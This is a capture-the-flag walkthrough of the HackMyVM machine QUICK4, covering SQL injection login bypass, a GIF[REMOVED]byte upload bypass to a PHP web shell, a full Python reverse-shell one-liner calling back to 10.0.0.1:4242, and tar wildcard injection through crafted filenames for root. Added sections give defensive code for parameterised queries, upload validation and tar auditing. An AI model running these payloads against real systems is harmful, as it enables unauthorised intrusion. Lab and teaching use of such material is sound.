Hackmyvm QUICK4

Vishal
4 min read · May 4, 2024

Let’s try another machine from hackmyvm QUICK4.

Enumerate open ports with nmap. It has only a couple of ports open: 80 and 22.

nmap showing ports 22 and 80 open

Let’s fuzz the web application for files and directories. First I fuzzed for files but did not get anything; then I performed directory fuzzing and found some results. I also used dirb for the same, and it gave detailed results that were almost the same.

wfuzz result

Let’s visit the web page in the browser; we see the same page as in the earlier Quick machines.

web app in browser

When I clicked on ‘Make Appointment’, it asked me to register a user which I did.

customer registration

After login I checked whether it is vulnerable to IDOR, which was the case in the previous machines, but obviously it is not. I also checked for SQLi in the id parameter; it is not vulnerable.

After clicking on contacts, it gave me a list of all employees.

contacts

This might be useful somewhere. Let’s visit the /employee directory in the web browser. It is asking for credentials.

employee login page

We have usernames but don’t have the password. We can try SQL injection in the login form with any of the available users.

SQL injection payload in password parameter

SQL injection successful. We are able to log in as the user ‘andrew.speed@quick.hmv’.

Employee after login
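To show why the employee login fell to a payload in the password field, here is an added example (not code from the QUICK4 application) that builds a constructed in-memory SQLite table and compares a login written with string concatenation against one written with a parameterised query. The employee names and passwords are made up; the point is that the concatenated query turns the password input into SQL, so a tautology matches every row and the first row wins, which is also why the later attempt as nick returned the quick user.

```python
import sqlite3

# Constructed sample rows (hypothetical, not the machine's real database).
# Plaintext passwords are kept only so the demo stays short; real apps store hashes.
EMPLOYEES = [
    ("quick", "quick@quick.hmv", "pw-quick"),
    ("andrew", "andrew.speed@quick.hmv", "pw-andrew"),
    ("nick", "nick.greenhorn@quick.hmv", "pw-nick"),
]


def build_db():
    """Create an in-memory employees table filled with the constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE employees (id INTEGER PRIMARY KEY, name TEXT, email TEXT, password TEXT)"
    )
    conn.executemany(
        "INSERT INTO employees (name, email, password) VALUES (?, ?, ?)", EMPLOYEES
    )
    return conn


def login_vulnerable(conn, email, password):
    """Anti-pattern: user input is spliced into the SQL text, so quotes in the
    password become part of the query. Returns the matched name or None."""
    sql = (
        "SELECT name FROM employees "
        f"WHERE email = '{email}' AND password = '{password}'"
    )
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def login_safe(conn, email, password):
    """Parameterised query: values travel separately from the SQL text, so a
    quote in the input is just a character to compare, never syntax."""
    row = conn.execute(
        "SELECT name FROM employees WHERE email = ? AND password = ?",
        (email, password),
    ).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    db = build_db()
    payload = "' OR '1'='1"
    print("vulnerable:", login_vulnerable(db, "nick.greenhorn@quick.hmv", payload))
    print("safe:      ", login_safe(db, "nick.greenhorn@quick.hmv", payload))
```

With the tautology in the password the concatenated query becomes `... AND password = '' OR '1'='1'`; `AND` binds tighter than `OR`, so the condition is true for every row and `fetchone()` hands back the first employee regardless of which email was supplied. The parameterised version compares the literal string and finds nothing. Detection on the server side is straightforward: log queries that return a row for a password containing a quote character, or simply alert on authentication events whose returned account does not match the submitted email.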

I tried sqlmap to get a shell but was unable to. sqlmap was able to list the databases.

sqlmap showing databases

When I checked further, I saw that we have the ability to upload a photo.

upload functionality

Let’s try to upload a malicious PHP file and see what the application says.

uploading a php file

I tried to upload a PHP script, which failed. Let’s try to bypass the check with magic bytes. I just added the magic bytes for GIF, which are GIF87a, and was able to upload the malicious file.

uploaded malicious file bypass using Magic bytes
File uploaded successfully
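The upload check above only looked at the first bytes of the file, so prepending GIF87a was enough. As an added example (mine, not the application's code), here is an upload validator that requires both an allowlisted extension and magic bytes that match that specific extension, and that assigns a random server-side name so the client-chosen filename never reaches disk. The sample payloads in the test are constructed.

```python
import os
import secrets

# Magic bytes per allowlisted extension. A file is accepted only when its
# extension is in this table AND its leading bytes match that entry.
ALLOWED_IMAGE_SIGNATURES = {
    "gif": (b"GIF87a", b"GIF89a"),
    "png": (b"\x89PNG\r\n\x1a\n",),
    "jpg": (b"\xff\xd8\xff",),
}


def validate_image_upload(filename, data):
    """Return (accepted, reason).

    Rejects any extension outside the allowlist (so .php never passes no matter
    what its header says) and rejects allowlisted extensions whose content does
    not start with the matching signature (so a renamed script never passes).
    """
    base = os.path.basename(filename)
    if "." not in base:
        return False, "no extension"
    ext = base.rsplit(".", 1)[1].lower()
    if ext == "jpeg":
        ext = "jpg"
    if ext not in ALLOWED_IMAGE_SIGNATURES:
        return False, f"extension .{ext} not allowed"
    if not any(data.startswith(sig) for sig in ALLOWED_IMAGE_SIGNATURES[ext]):
        return False, f"content does not match .{ext} signature"
    return True, "ok"


def stored_name(ext):
    """Server-chosen random name. Combined with storing uploads outside the web
    root (or in a directory where the PHP handler is disabled), this removes
    both the executable extension and the guessable path seen on the box."""
    return f"{secrets.token_hex(16)}.{ext}"


def handle_upload(filename, data):
    """Validate and return the name the file would be stored under, or None."""
    accepted, _reason = validate_image_upload(filename, data)
    if not accepted:
        return None
    return stored_name(filename.rsplit(".", 1)[1].lower())


if __name__ == "__main__":
    # Constructed payloads: a PHP file with a GIF header, and a real-looking GIF.
    print(validate_image_upload("myimage2.php", b"GIF87a<?php /* script */ ?>"))
    print(validate_image_upload("photo.gif", b"GIF89a\x01\x00\x01\x00"))
    print(handle_upload("photo.gif", b"GIF89a\x01\x00\x01\x00"))
```

Two caveats a reviewer would add: a polyglot that is a valid GIF and also contains PHP will still pass the signature check, so the upload directory must not be executable by the web server's PHP handler; and the random name should be recorded in the database against the uploading user, because the original `2_myimage2.php` pattern leaked both the user id and the attacker-controlled name into the page source.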

After that I tried to log in with SQL injection as the user “nick.greenhorn@quick.hmv”, but got the profile of the quick user, which might be the first user in the database.

I changed the password for the user using the same method used to upload the photo.

After logging in as the nick user, I inspected the elements, especially the profile name, and saw the path of the uploaded file.

uploaded file path employee/uploads/2_myimage2.php

I browsed the path in another tab and it gave me the page below.

Let’s try to run commands using the PHP shell.

contents of /etc/passwd

Let’s try to get a reverse shell using a Python reverse shell. I used the one-liner below:

python -c 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",4242));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")'

reverse shell on the box

I used LinPEAS to find a way to escalate privileges; the Cron Job section of the output shows the job below.

Let’s open the backup script. It uses the tar command with a wildcard, which is not good practice.

backup.sh

I used the method described in this article; it is a really great write-up. As mentioned in the article, I created a file named with the switch --index-file=output.txt, and after a few seconds saw the output.txt file with root permissions.

In the article it is mentioned to create a user with root permissions; instead I will add a reverse shell which connects back to the attacker machine.

content of shell file to get reverse shell

Executed commands:

touch -- '--checkpoint-action=exec=bash myshell.sh'

touch '/var/www/html/--checkpoint-action=exec=bash myshell.sh'
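The backup job is exploitable because the shell expands `*` into the argument list and tar parses any expanded name that starts with a dash as an option. As an added example from the defender's side (mine, not from the article or the box), here is a small Python check that lists option-shaped filenames in a directory, flags the ones that map to tar options able to run commands, and builds a tar argv that archives the directory without ever expanding a glob. The directory contents in the test are constructed in a temporary directory.

```python
import os
import tempfile

# GNU tar long options that cause tar to execute a program. A filename that
# starts with one of these and is swept up by an unquoted '*' is the pattern
# behind the checkpoint trick used on this box.
TAR_COMMAND_OPTIONS = (
    "--checkpoint-action",
    "--to-command",
    "--use-compress-program",
    "--rsh-command",
    "--info-script",
    "--new-volume-script",
)


def find_option_like_names(directory):
    """Return names in `directory` that a glob would hand to tar as options.
    Suitable as a periodic integrity check on directories a root cron job tars."""
    return sorted(name for name in os.listdir(directory) if name.startswith("-"))


def classify_option_name(name):
    """'command-execution' if the name maps to an option that runs a program,
    otherwise 'option-injection' (still worth alerting on)."""
    for opt in TAR_COMMAND_OPTIONS:
        if name == opt or name.startswith(opt + "="):
            return "command-execution"
    return "option-injection"


def audit_directory(directory):
    """Map each suspicious filename to its risk class."""
    return {name: classify_option_name(name) for name in find_option_like_names(directory)}


def safe_tar_argv(directory, archive):
    """Build a backup command that file names cannot influence: tar changes
    into the directory itself and archives '.', so no shell glob is expanded
    and '--' ends option parsing before the only operand."""
    return ["tar", "-czf", archive, "-C", directory, "--", "."]


if __name__ == "__main__":
    demo = tempfile.mkdtemp()
    for name in ("index.html", "--checkpoint=1", "--checkpoint-action=exec=bash myshell.sh"):
        open(os.path.join(demo, name), "w").close()
    print(audit_directory(demo))
    print(" ".join(safe_tar_argv("/var/www/html", "/backup/site.tgz")))
```

The fix in the script itself is the argv shape `safe_tar_argv` returns: `tar -czf /backup/site.tgz -C /var/www/html -- .` archives the same files as `cd /var/www/html && tar -czf /backup/site.tgz *` but never lets the contents of the directory reach tar's option parser. The audit function is the detection counterpart: a file whose name begins with `--checkpoint-action` inside a web root has no legitimate reason to exist, and its creation time tells you when the web application was compromised.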

On my Kali machine I started the netcat listener and after a few seconds got the shell.

root shell

So this is the box; hope you like it. See you soon!!
